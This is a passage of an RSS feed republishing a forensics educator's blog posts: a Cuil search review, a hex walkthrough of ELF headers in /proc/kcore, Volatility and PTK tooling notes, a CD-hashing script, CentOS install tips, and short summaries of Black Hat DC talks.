I decided to search for penguin. According to the right hand side of Cuil, there are 66,229,028 results for penguin.

First of all, the website design is really nice. I know that doesn't matter as much, but I had to say that :-) I also like the columns, the short snippets and the pictures to the side. I have to agree with Cuil that showing a picture can help the user determine relevance (FAQ #7). There's even some tabs and a pull down menu across the top of the search to help narrow down your interest, such as "Penguin Books", "Penguin Classics", "Penguin Putnam", "Linux Penguin" etc. Ok, that's nice.

Now for the vanity searches. First off, I'm not some conceited schmuck who likes to google herself all the time, but I know what should pop up when my name is entered. Here it goes: there are 3,619,749 results for the search term "jamie levy" (without quotes).

Ok, so something of mine is not on the first page like on Google. Big deal. There's something of mine on the second page:

It's a tutorial of mine. It's kind of old, and it's kind of buried in my site. I thought I would at least see the index of my site if anything. Also, I'm not really sure what that picture is next to my page. I know I didn't put it there.

Ok, on the third page I see the same tutorial above as well as another OLD tutorial of mine that I forgot to take offline after I rewrote it. So that's bizarre; why would the first resulting tutorial repeat to the second page? What is that picture next to it? How did they find the old Unix tutorial?

This seems to be a pattern, however, as I found more repeats of these results and finally my index page on the fourth page of results. However, there is finally a correct picture next to the wireshark tutorial:

After looking just a little bit more I found another old course page of mine, which repeats as well:

Ok, so what happens if I decide to narrow down my search and look for myself at the place where I work? Cuil only shows four results, though it claims there are 43,752 results, three of which we have already seen above. Look next to the Unix tutorial; do you find anything curious there? I did:

Who is that man in the picture? He's so mysterious. I know I didn't put him there. Here's a closeup:

Bizarre is all I can say. Does his picture seem relevant to Unix? I wouldn't think so, but it seems like some of these pictures are just random. Also, the stuff that Cuil pulls up seems as if it's from some older snapshot. I haven't quite figured it out.

Well, I won't bore you with details of other people I "Cuil"ed, but I thought it was interesting that I couldn't find my past adviser at all when there are 815,000 pages in Google related to his name.

I guess he isn't "Cuil" enough :-)</description><link>http://www.secuobs.com/revue/news/97787.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97787.shtml</guid></item>
<item><title>Network Distance Script</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I have decided to release some more code. I'm not claiming any of this is good, but it has served a purpose either personally or in the classroom at some point. The last item added is a distance perl script to measure Levenshtein distance of two pcap files. I wrote this for some experiments with malware some time back. I figured I should share it in case it is of use to someone before I misplace it :-) More details are included in the script itself.</description><link>http://www.secuobs.com/revue/news/97786.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97786.shtml</guid></item>
<item><title>ELF headers: executable vs /proc/kcore</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is for 32bit. According to elf.h:

#define EI_NIDENT 16

typedef struct
{
  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
  Elf32_Half    e_type;             /* Object file type */
  Elf32_Half    e_machine;          /* Architecture */
  Elf32_Word    e_version;          /* Object file version */
  Elf32_Addr    e_entry;            /* Entry point virtual address */
  Elf32_Off     e_phoff;            /* Program header table file offset */
  Elf32_Off     e_shoff;            /* Section header table file offset */
  Elf32_Word    e_flags;            /* Processor-specific flags */
  Elf32_Half    e_ehsize;           /* ELF header size in bytes */
  Elf32_Half    e_phentsize;        /* Program header table entry size */
  Elf32_Half    e_phnum;            /* Program header table entry count */
  Elf32_Half    e_shentsize;        /* Section header table entry size */
  Elf32_Half    e_shnum;            /* Section header table entry count */
  Elf32_Half    e_shstrndx;         /* Section header string table index */
} Elf32_Ehdr;

Sizes for Elf32_* in bytes:
Word: 4
Half: 2
Off: 4
Addr: 4

Looking at a regular binary like ls for example:

$ dd if=/bin/ls bs=52 count=1|xxd
1+0 records in
1+0 records out
52 bytes (52 B) copied, 3.6108e-05 s, 1.4 MB/s
0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000  .ELF............
0000010: 0200 0300 0100 0000 0099 0408 3400 0000  ............4...
0000020: ec7f 0100 0000 0000 3400 2000 0800 2800  ........4. ...(.
0000030: 2000 1f00                                 ...

I'm using the ELF manual to analyze this.

The first line (16 bytes) is the e_ident value, which consists of:
The "magic" value for the first four characters: 7f45 4c46
The file class (EI_CLASS): 0x1 (ELFCLASS32)
Data encoding (EI_DATA): 0x1 (ELFDATA2LSB, little endian)
File version (EI_VERSION): 0x1 (current)
Start of padded bytes (EI_PAD)

On the second line:
e_type 0x2 tells us it is an executable file
e_machine value 0x3 tells us that this was compiled on Intel Architecture
e_version value 0x1 tells us it is current
e_entry (virtual address to which control is given) is 0x8049900
e_phoff: program headers start at offset 0x34

On the third line:
0x17fec is the section header offset (e_shoff)
e_flags value 0x0 tells us that no flags are set
e_ehsize value of 0x34 tells us that the header is of size 52 bytes (decimal)
e_phentsize value of 0x20 tells us that one entry in the program header table is 32 bytes
e_phnum value of 0x8 tells us the number of entries in the program header table is 8
e_shentsize value of 0x28 tells us the size of one entry in the section header table is 40 bytes

On the fourth line:
e_shnum value of 0x20 tells us that the number of entries in the section header table is 32
e_shstrndx value of 0x1f holds the section header table index of the entry associated with the section name string table

So what does /proc/kcore look like?

# dd if=/proc/kcore bs=52 count=1|xxd
1+0 records in
1+0 records out
52 bytes (52 B) copied, 3.9321e-05 s, 1.3 MB/s
0000000: 7f45 4c46 0101 0100 0000 0000 0000 0000  .ELF............
0000010: 0400 0300 0100 0000 0000 0000 3400 0000  ............4...
0000020: 0000 0000 0000 0000 3400 2000 0300 0000  ........4. .....
0000030: 0000 0000                                ....

The first line is the same as above.

The second line:
e_type 0x4 tells us it is a core file (ET_CORE) *
e_machine value 0x3 tells us that this was compiled on Intel Architecture
e_version value 0x1 tells us it is current
e_entry (virtual address to which control is given) is 0x0
e_phoff: program headers start at offset 0x34

* this is useful to know if we are dealing with a core file

In the third line:
e_shoff value is 0x0, letting us know there is no section header offset
e_flags value 0x0 tells us that no flags are set
e_ehsize value of 0x34 tells us that the elf header is of size 52 bytes (decimal)
e_phentsize value of 0x20 tells us that one entry in the program header table is 32 bytes
e_phnum value of 0x3 tells us the number of entries in the program header table is 3
e_shentsize value of 0x0 tells us that there is no section header

The fourth line values are all 0x0.

To make your life easier, here is a C program that will extract all of that information for you :-) You must be root to run it. Note: I know I could have done this a bit more elegantly, but decided against that.</description><link>http://www.secuobs.com/revue/news/97785.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97785.shtml</guid></item>
<item><title>It's been a while</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Well, it's been a while since I've written anything. This is just a brief update for those who care. I've been busy and I switched locations for the semester. I'm not going to go over everything that's happened since my last post, but I'm teaching at John Jay College this semester instead of Queens College. It's still CUNY :-) and everything is still cool.

Oh, our paper was accepted :-) This is not the final copy, but you get the gist. Edit: The schedule is up now.

What's next?</description><link>http://www.secuobs.com/revue/news/97784.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97784.shtml</guid></item>
<item><title>PyFlag on Windows</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - PyFlag is now available on Windows. I haven't had a chance to try it on Windows, but I will soon and then I'll report on it. I've used it on Linux however, and it's really nice :-)</description><link>http://www.secuobs.com/revue/news/97783.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97783.shtml</guid></item>
<item><title>Visual Forensic Analysis</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - There's an interesting talk coming up at John Jay College:

The Center for Cybercrime Studies
The John Jay College of Criminal Justice
Presents
Visual Forensic Analysis

Speaker: Greg Conti
Computer Science Department
United States Military Academy

For decades hex was the common tongue of reverse engineers and forensic analysts, but we can do better. Hex editors are the Swiss Army knives of low level analysis and have evolved significantly, but are now at a local maximum. With the tiny textual window hex provides, it is difficult, if not impossible, to understand the big picture context and inner workings of binary objects - files, file systems, process memory, and network traffic. While there are helpful tools to analyze the special case of executable files, little work exists to help address the general case of all types of binary objects. This talk presents visual approaches to improve the art and science of forensic analysis, diffing, and reverse engineering, both in the context independent case where little is known about the raw structure of the binary data and at the semantic level where external knowledge can be used to inform analysis. If you are faced with low level analysis tasks, you should attend this talk.

Greg Conti is an Assistant Professor of Computer Science at the United States Military Academy. His research includes security data visualization and web-based information disclosure. He is the author of Security Data Visualization (No Starch Press) and the forthcoming Googling Security (Addison-Wesley). His work can be found at www.gregconti.com and www.rumint.org.

Date:        September 24, 2008
Time:        3:30 PM
Location:    Mathematics Conference Room - 4238N, 445 West 59th Street, New York City 10019
RSVP: Nicole Daniels at 212-237-8920 or email ndaniels@jjay.cuny.edu

For additional information please contact Professor Doug Salane, Director of the Center for Cybercrime Studies, at 212-237-8836 or email dsalane@jjay.cuny.edu</description><link>http://www.secuobs.com/revue/news/97782.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97782.shtml</guid></item>
<item><title>/proc/kcore part II</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - It will take me a few posts to go through the kcore file. The last kcore post dealt only with the ELF headers of the kcore file. After the ELF header ends, there are 3 program headers. From elf.h we see that the structure of a program header is:

typedef struct
{
  Elf32_Word p_type;   /* Segment type */
  Elf32_Off  p_offset; /* Segment file offset */
  Elf32_Addr p_vaddr;  /* Segment virtual address */
  Elf32_Addr p_paddr;  /* Segment physical address */
  Elf32_Word p_filesz; /* Segment size in file */
  Elf32_Word p_memsz;  /* Segment size in memory */
  Elf32_Word p_flags;  /* Segment flags */
  Elf32_Word p_align;  /* Segment alignment */
} Elf32_Phdr;

A look at the first program header below:

0000030: 0000 0000 0400 0000 9400 0000 0000 0000  ................
0000040: 0000 0000 d807 0000 0000 0000 0000 0000  ................
0000050: 0000 0000                                ....

The first program header is of type PT_NOTE (Auxiliary info), which has a value of 0x4. We can see that the offset is 0x94. The filesize has a value of 0x7d8. All other parts of the struct are set to 0x0.

A look at the second program header below:

0000050: 0000 0000 0100 0000 0010 8038 0000 80f8  ...........8....
0000060: 0000 0000 00e0 ff06 00e0 ff06 0700 0000  ................
0000070: 0010 0000                                ....

The type is PT_LOAD (0x1, loadable program segment). The offset is 0x38801000. vaddr is 0xf8800000 (vmalloc). filesz and memsz are both 0x6ffe000. flags are 0x7 (PF_R | PF_W | PF_X). Page alignment is 0x1000 (size of a page: 4096). The other remaining part of the structure, p_paddr, is 0x0.

The third program header looks like:

0000070: 0010 0000 0100 0000 0010 0000 0000 00c0  ................
0000080: 0000 0000 0000 0038 0000 0038 0700 0000  .......8...8....
0000090: 0010 0000                                ....

The type is PT_LOAD (0x1, loadable program segment). The offset is 0x1000 (size of a page: 4096). vaddr is 0xc0000000 (start of lowmem). filesz and memsz are both 0x38000000 (size of kcore - 4096). flags are 0x7 (PF_R | PF_W | PF_X). Page alignment is 0x1000 (size of a page: 4096). The other remaining part of the structure, p_paddr, is 0x0.

From my messages file to compare:

Sep 15 12:28:57 kanga kernel: Memory: 2060724k/2087616k available (2252k kernel code, 25548k reserved, 1182k data, 284k init, 1170112k highmem)
Sep 15 12:28:57 kanga kernel: virtual kernel memory layout:
Sep 15 12:28:57 kanga kernel:     fixmap  : 0xffc53000 - 0xfffff000   (3760kB)
Sep 15 12:28:57 kanga kernel:     pkmap   : 0xff400000 - 0xff800000   (4096kB)
Sep 15 12:28:57 kanga kernel:     vmalloc : 0xf8800000 - 0xff3fe000   (107MB)
Sep 15 12:28:57 kanga kernel:     lowmem  : 0xc0000000 - 0xf8000000   (896MB)
Sep 15 12:28:57 kanga kernel:       .init : 0xc0761000 - 0xc07a8000   (284kB)
Sep 15 12:28:57 kanga kernel:       .data : 0xc063337f - 0xc075ab88   (1182kB)
Sep 15 12:28:57 kanga kernel:       .text : 0xc0400000 - 0xc063337f   (2252kB)

Notes

The next three sections will use this structure:

struct memelfnote
{
  const char *name;
  int type;
  unsigned int datasz;
  void *data;
};

Looking at the first note (only the interesting part; the rest is zeroed out):

0000090: 0010 0000 0500 0000 9000 0000 0100 0000  ................
00000a0: 434f 5245                                CORE

In this case the items shown are not in the same order as the struct. This is because they have been placed in a slightly different order. First we have the size of the name: 0x5 (strlen("CORE")+1). Then the data size: 0x90 (size of the elf_prstatus struct). Then the type: 0x1 (NT_PRSTATUS). Then the name itself: CORE. And finally the data, which has been zeroed out (not shown).

The next note looks like the following:

                             0500 0000 7c00 0000
0000140: 0300 0000 434f 5245 0000 0000 0052 0000  ....CORE.....R..
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000160: 0000 0000 0000 0000 766d 6c69 6e75 7800  ........vmlinux.
0000170: 0000 0000 0000 0000 726f 2072 6f6f 743d  ........ro root=
0000180: 2f64 6576 2f56 6f6c 4772 6f75 7030 302f  /dev/VolGroup00/
0000190: 4c6f 6756 6f6c 3030 2072 6867 6220 7175  LogVol00 rhgb qu
00001a0: 6965 7400 0000 0000 0000 0000 0000 0000  iet.............
00001b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001c0: 0000 0000 0000 0000                      ........

First we have the size of the name: 0x5 (strlen("CORE")+1). Then the data size: 0x7c (sizeof(struct elf_prpsinfo)). Then the type: 0x3 (NT_PRPSINFO). Then the name itself: CORE. And finally the data, which uses the elf_prpsinfo structure:

struct elf_prpsinfo
{
  char pr_state;               /* numeric process state */
  char pr_sname;               /* char for pr_state */
  char pr_zomb;                /* zombie */
  char pr_nice;                /* nice val */
  unsigned long pr_flag;       /* flags */
  __kernel_uid_t pr_uid;
  __kernel_gid_t pr_gid;
  pid_t pr_pid, pr_ppid, pr_pgrp, pr_sid;
  /* Lots missing */
  char pr_fname[16];           /* filename of executable */
  char pr_psargs[ELF_PRARGSZ]; /* initial part of arg list */
};

The data consists of:
pr_state: 0x0
pr_sname: 0x52 (R)
pr_zomb: 0x0
Executable file name (pr_fname): "vmlinux"
Saved command line (pr_psargs, up to 80 characters): ro root=/dev/VolGroup00/LogVol00 rhgb quiet
The rest is zeroed out (from a memset command).

The third note denotes information about the current task. Here is part of it:

                             0500 0000 9006 0000
00001d0: 0400 0000 434f 5245 0000 0000 0000 0000  ....CORE........
00001e0: 0020 b2f0 0200 0000 0021 4000 ffff ffff  . .......!@.....
00001f0: 7800 0000 7800 0000 7800 0000 b086 8af0  x...x...x.......
0000200: b086 8af0 4072 63c0 0004 0000 0000 4000  ....@rc.......@.
0000210: 0100 0000 0000 0000 0000 0000 0100 0000  ................
0000220: 494c 6a33 c10a 0000 2fd2 1d00 0000 0000  ILj3..../.......
0000230: 85b4 abc6 0c01 0000 6134 0c00 0000 0000  ........a4......
0000240: 0000 0000 0000 0000 5669 0d00 0000 0000  ........Vi......

First we have the size of the name: 0x5 (strlen("CORE")+1). Then the data size: 0x690 (sizeof(struct task_struct), found in linux/sched.h). Then the type: 0x4 (NT_TASKSTRUCT). Then the name itself: CORE. And finally the data, which consists of `current', which is the current thread (not shown above).

Now we must dissect the task_struct info, which we'll do a bit later.</description><link>http://www.secuobs.com/revue/news/97781.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97781.shtml</guid></item>
<item><title>PolyTech forensics challenge</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Yay! Another former student, Fausto Dutan, is in the finals (one got third place last year). There's also a MS student from John Jay, Richard Alcalde. Go CUNY :-) Good luck to all of the finalists.

Edit 10/17: Richard Alcalde got 1st place. Congrats Richard :-)</description><link>http://www.secuobs.com/revue/news/97780.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97780.shtml</guid></item>
<item><title>PTK 0.2 Patch</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - In case you missed it, I've created a patch for PTK. You can find it here. This fixes the path issue for those who have Sleuthkit installed in /usr/local/bin. PTK 1.0 will be released soon and this will no longer be an issue.</description><link>http://www.secuobs.com/revue/news/97779.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97779.shtml</guid></item>
<item><title>Permeate MITM</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - It's been a long while. For that I apologize. I guess I'm not a very good blogger when the semester is in full stride. Anyway, there's a new code release for Permeate, this time with the MITM detection built in. A paper we recently submitted to ICC 09 is available there as well. Shouts to Jarek and BK :-) Enjoy.</description><link>http://www.secuobs.com/revue/news/97778.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97778.shtml</guid></item>
<item><title>Vol2html Perl Script</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - During my forensics class I started thinking of a way to make it easier for my students to sort through the output of Volatility, and started writing a little perl script to create an html report of running processes, open files and dlls.

This is not finished, as there is more information that I would like to correlate from the output of Volatility. But if you are somewhat curious, this is what I have so far: vol2html.pl. You can see an example report here. The output files for this report and the perl script are bundled together here. There is minimal error checking.

To use, first redirect the output of Volatility for pslist, dlllist and files to text files:

./volatility pslist -f mem.dd > pslist.txt
./volatility files -f mem.dd > files.txt
./volatility dlllist -f mem.dd > dlllist.txt

Then feed the perl script these files:

./vol2html.pl -pslist pslist.txt -files files.txt -dlllist dlllist.txt

There is more coming.</description><link>http://www.secuobs.com/revue/news/97777.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97777.shtml</guid></item>
<item><title>VMWare Workstation machine to VMWare Server</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Recently I received a VMware image to work on. I had installed VMware Server 1.0.8 on my CentOS 5.2 laptop because 2.0 is just painful. Unfortunately the image had been created with a newer version of Workstation, rendering it incompatible with my install. I found the VMware converter, but it wasn't much help since I'm on a Linux machine.

I created a new default machine using VMware Server with the basic settings matching those of the target machine, and copied the resulting .vmx file into the folder of the target machine. I could have just modified the original .vmx file, but decided to start over cleanly.

So now the vmware machine tries to boot, but fails with the following message:

One or more of your disk files were created by a more recent version of VMware software and are not supported by this version of VMware Server.

Then I modified the .vmdk descriptor file from:

ddb.virtualHWVersion = "7"

to

ddb.virtualHWVersion = "4"

Worked like a charm :-) I don't know if this will work in every case, but it might be helpful to someone.</description><link>http://www.secuobs.com/revue/news/97776.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97776.shtml</guid></item>
<item><title>OT: Twitter</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - So I finally broke down and created a Twitter account recently. It started when I began watching a few people on Twitter. They often had very interesting Tweets related to my interests. After a while I realized that it would be easier to keep up with these Tweets by following these people with my own Twitter account. Now, the reason I haven't had one up to this point was mostly because I was afraid of the privacy issues. While teaching undergraduate classes I have often been asked if I have a Facebook, Myspace, Twitter or whatever account so that students could ``befriend'' me. Till now I have abstained from these types of accounts mostly to avoid these types of student/teacher online friendships. Not that I dislike my students (I don't), but I just figured it might get uncomfortable at some point. I am wondering if others have struggled with this issue. I know there are some people on Twitter who teach classes like me. I have made my Tweets private for now to make sure that I know who is following me (but can you ever *really* know?). I know this is probably not the most favorable setup, but it makes me feel somewhat better that my inconsequential Tweets are not just openly exposed to everyone. The people on Twitter are cool and the information they give rocks. So far I am really enjoying it :-)</description><link>http://www.secuobs.com/revue/news/97775.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97775.shtml</guid></item>
<item><title>vol2html.pl update</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - I made a small update to vol2html.pl. Since there are a lot of html files being generated, I thought it might be nice to allow the user to specify an output directory. So there is an extra optional option: -D if you want to print all html files to another directory. If the directory does not exist, it is created. The script currently does not check if files exist in this directory and will clobber any files with the same name.

I have also added some more information about the open files. You can now see all processes that have the same open files and how many times each process has a file open. To do this, click on the process of interest and click open files. Each file name is linked to a report, which contains a list of all processes (by pid) that have the file open and how many times that process has the file open. There is a link to each pid as well. Also new: there is a link to the index.html file at the end of each report.

Since my website is down for now, you can get the updated script here (updated 1/11/09 and moved from google code, which was messing up some things). Hopefully this is helpful. Another update: here's a second report to look at. Still more to come.</description><link>http://www.secuobs.com/revue/news/97774.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97774.shtml</guid></item>
<item><title>Practitioner's Guide to Capturing and Analysis of RAM</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is a late post, but I've been busy. I learned about this video from Moyix on the Volatility irc channel (#volatility on freenode). It's nice that people like vol2html. It encourages me to add more to it. There's more info here if you are interested. I'm glad to see that memory analysis is getting more visibility. Cool stuff. Enjoy. Dale Beauchamp - DojoSec January 2009, from Marcus Carey on Vimeo.</description><link>http://www.secuobs.com/revue/news/97773.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97773.shtml</guid></item>
<item><title>Hash of a CD</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Recently I had to see if two CDs were identical. I had the hash value of the iso for the desired content, so I decided to check the hash for both CDs. There is really not that much to this post, but just in case someone ever needs to know how to do this, I'll give you the command line how-to.

In my case, md5sum /dev/cdrom did not work. Now there is no reason to copy the CD to an iso file in order to do this. You can just use dd and pipe the output into md5sum or sha1sum. I found that just doing a straight dd without extra options did not work. So you should use isoinfo to get the logical block size and the volume size to feed to dd (bs="Logical block size" and count="Volume size"). The reason is that reading the raw device does not stop at the end of the ISO 9660 volume: the drive may return extra sectors or fail with an I/O error near the lead-out, so the hash will not match the .iso. Limiting dd to the volume's logical block count hashes exactly the bytes the image contains. I decided to put this all into a bash script you can find here. The code is shown below:

# Pull "Volume size is: N" and "Logical block size is: N" out of isoinfo -d;
# isoinfo prints the block size line first, so INFO[0] is the block size.
INFO=`isoinfo -d -i /dev/cdrom | awk '{ if ($1 ~ /Volume/ &amp;&amp; $2 ~ /size/) print $4; else if ($1 ~ /Logical/ &amp;&amp; $2 ~ /block/ &amp;&amp; $3 ~ /size/) print $5 }'`
INFO=($INFO)
echo "Logical block size: ${INFO[0]}"
echo "Volume size: ${INFO[1]}"
echo "Now executing: "
echo "dd if=/dev/cdrom bs=${INFO[0]} count=${INFO[1]} conv=notrunc,noerror,sync | md5sum"
# Read exactly count blocks of bs bytes and hash them without writing an image.
dd if=/dev/cdrom bs=${INFO[0]} count=${INFO[1]} conv=notrunc,noerror,sync | md5sum

It's not the most beautiful solution, but there it is. This uses md5; for other hashes just modify the script as needed. Also, if your CD device is not /dev/cdrom, modify that as well. Note that noerror,sync makes dd zero-fill an unreadable block instead of aborting, so a mismatching hash can also mean a bad sector rather than different content; watch dd's error output.</description><link>http://www.secuobs.com/revue/news/97772.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97772.shtml</guid></item>
<item><title>PTK on CentOS 5.2</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Having some spare time over the weekend caused me to attempt an installation of PTK on my spare CentOS box. I've succeeded in getting it to run under Fedora, so I had a little bit of an idea of what I was getting myself into.

Before you get started, make sure you have the following packages installed:

mysql
mysql-server
php
php-mysql
php-mbstring
httpd
Sleuthkit

If you need EWF or AFF support you can install them from:

libewf
afflib

After installing everything, you need to initialize MySQL as root:

# /sbin/chkconfig mysqld on
# /sbin/service mysqld start
# mysqladmin -u root password 'new-passwd'

You must use quotes around the new-passwd you choose, and don't forget what it is. You must also start the http server as root:

# /sbin/service httpd start

Now you are ready to download and install PTK from sourceforge. I downloaded version 1.0.5. In order to install PTK, extract the tarball in your webserver directory as root:

# cd /var/www/html
# ls
ptk-1.0.5.tar.gz
# tar -xzf ptk-1.0.5.tar.gz
# chown -R apache:apache ptk

The last command above makes sure that all files are owned by the webserver user.

Now we have to address a problem that still exists regarding the installation script. Go inside the ptk folder. At this point, you should see the install.php script. If you have Sleuthkit installed in /usr/local/bin the install script will not work as expected, because this is not in its path. You can find out where it is installed by typing which plus one of the Sleuthkit commands, e.g.:

$ which istat

If the path returned is /usr/local/bin then you can modify the install.php file by changing entries like:

$istat = shell_exec("which istat");

to

$istat = shell_exec('export PATH="/usr/bin:/usr/local/bin"; which istat');

and so on. If all goes well, you will get to the options screen. Fill everything out as you like (including distro) and press next.

Now, when I installed PTK under Fedora, everything was ready to go at this point. With CentOS, it was another story. For some reason, things did not get updated with the extra configure scripts. So, you have to manually add the locations for your Sleuthkit executables in the following files:

config/conf.php
config/conf.pl

where config is the folder within the ptk folder (/var/www/html/ptk/config). If you open up conf.pl it may look like:

installdir = '/var/www/html/ptk/',
md5_bin = '/usr/bin/md5sum',
sha1_bin = '/usr/bin/sha1sum',
fsstat_bin = '',
mmls_bin = '',
fls_bin = '',
istat_bin = '',
(snip)

Notice that there are some blank entries. Therefore you will have to enter the correct path for those executables. All right, so I'm not going to make you do it :-) Here are the modified files for my CentOS box. Just make sure you put them in the right places, and you might have to chown them as well. Enjoy, and hope this helps someone out there.</description><link>http://www.secuobs.com/revue/news/97771.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97771.shtml</guid></item>
<item><title>Some Brief BH DC Afterthoughts</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Though it's almost too late for this, I thought I would write briefly on BH DC. I had a blast while I was there and there were some very interesting talks. In case you are interested in the content of these talks, slides, papers, demos and videos are being uploaded to this site: https://www.blackhat.com/html/bh-dc-09/bh-dc-09-archives.html

The talks I liked the most were:

Let Your Mach-O Fly by Vincenzo Iozzo. This talk describes how to replace a running process in memory with another by unmapping the current process, replacing the header and enveloping the old process with the new process. It was really cool to see the demos, but if you watch the video (if it is uploaded), you will see he has trouble with the safari example. I didn't have time to confirm my suspicions, but I thought this is because he didn't supply the entire path to the desired executable. I came to him after the talk to ask about this, but things were so rushed at the end that I didn't get a chance to ask. I emailed him and he replied: ``I found the problem, I forgot to patch a known bug before my talk,'' so he seems to have found the problem. The code for this one is available online.

New Techniques for Defeating SSL/TLS by Moxie Marlinspike. I wasn't completely sure at first that this was going to be an interesting talk, but it turned out very nice. The title is misleading in that it wasn't really about SSL in general but about https specifically. He has a tool that can MITM connections by rewriting references to https into http. While that is not as interesting, the more interesting part comes into play with the creation and usage of fake certificates to make things "secure". It was also funny how he used the favicon feature to give a positive indicator by switching it with a padlock. I'm not sure how effective it would be against items like Yahoo's sign-in seal among others, but there are other interesting possibilities. The code for his presentation is also available online (updated link).

Attacking Intel(R) Trusted Execution Technology by Joanna Rutkowska and Rafal Wojtczuk. This was an awesome talk. It was a pleasure to see this team of famous researchers talk about the internals of TXT and how they could exploit it. The video for this one is available online; it would definitely be worthwhile to watch it. Joanna has also posted the videos from the slides here: http://theinvisiblethings.blogspot.com/2009/02/attacking-intel-txt-paper-and-slides.html

Defending Against BGP Man-In-the-Middle Attacks by Earl Zmijewski. This was another awesome talk. I didn't know the fine details about routers before the talk, but the MITM attack is quite simple. It was also very interesting to see how they came to a solution for detecting these attacks. It was also interesting that after they had refined their detection algorithm they only found three instances of the attack "in the wild", all of which could be explained. Another must read/watch I think, and Earl is entertaining :-)</description><link>http://www.secuobs.com/revue/news/97770.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97770.shtml</guid></item>
<item><title>Briefly: IDA Pro on CentOS 5.2</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - This is almost a non-post, but who knows, it might be useful to someone. So today, while installing IDA Pro on CentOS, I hit a small snafu. Everything went well for key extraction: here's a nice tutorial for that. However, after I retrieved the key, I placed it according to the README file in the $HOME/.idapro directory. When running it I was faced with the following problem:

$ ./idal
./idal: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory

I noticed that my library was incompatible since it was libstdc++.so.6. Luckily, there are ``compat'' packages that contain these older libraries. You can install them with yum:

# yum install -y compat-libstdc++-33.i386

At this point, IDA Pro starts up nicely.</description><link>http://www.secuobs.com/revue/news/97769.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/97769.shtml</guid></item>
<item><title>PyFlag installation on CentOS 5.2 (updated)</title><description>Secuobs.com : 2009-05-18 15:59:25 - JL's stuff - Earlier I wrote about installing PyFlag on Fedora 8. This time, I decided to go for the CentOS install. First off, this tutorial is not for the faint of heart and as always I take no responsibility if things go wrong on your end.

I got tired of trying to get darcs installed on my CentOS box and instead downloaded the PyFlag tarball. The first thing you will have to do is update Python on your box - I installed 2.6.1 from source. You must also install all packages mentioned earlier, including MySQL for Python and Sleuthkit:

# yum install python-dateutil clamav clamav-server mysql mysql-devel mysql-server file-devel python-expect zlib zlib-devel openssl python-imaging

You may have a problem when you install MySQL for Python, however, when it tries to download the setuptools-*.egg file. If you have Python version 2.6 installed you need the following egg file: setuptools-0.6c9-py2.6.egg. You can download this into your MySQL-python-1.2.2 directory and change the name to setuptools-0.6c5-py2.6.egg, or you can muck around with the ez_setup.py file. However you want to do it:

# python2.6 setup.py build
# python2.6 setup.py install

Now, if you have Python 2.6 installed in addition to your default Python installation, you'll have to copy over some libraries to the new location, e.g.:

# cp -R /usr/lib/python2.4/site-packages/pexpect.py* /usr/local/lib/python2.6/site-packages/
# cp -R /usr/lib/python2.4/site-packages/PIL /usr/local/lib/python2.6/site-packages/
# cp -R /usr/lib/python2.4/site-packages/python-dateutil /usr/local/lib/python2.6/site-packages/
# cp /usr/lib/python2.4/pyexpect.py* /usr/local/lib/python2.6/

At this point you should be set to begin the PyFlag installation:

# ./configure
# make install

At that point you are set to run PyFlag. Don't forget to set up MySQL:

# /sbin/chkconfig mysqld on
# /sbin/service mysqld start
# mysqladmin -u root password 'new-passwd'

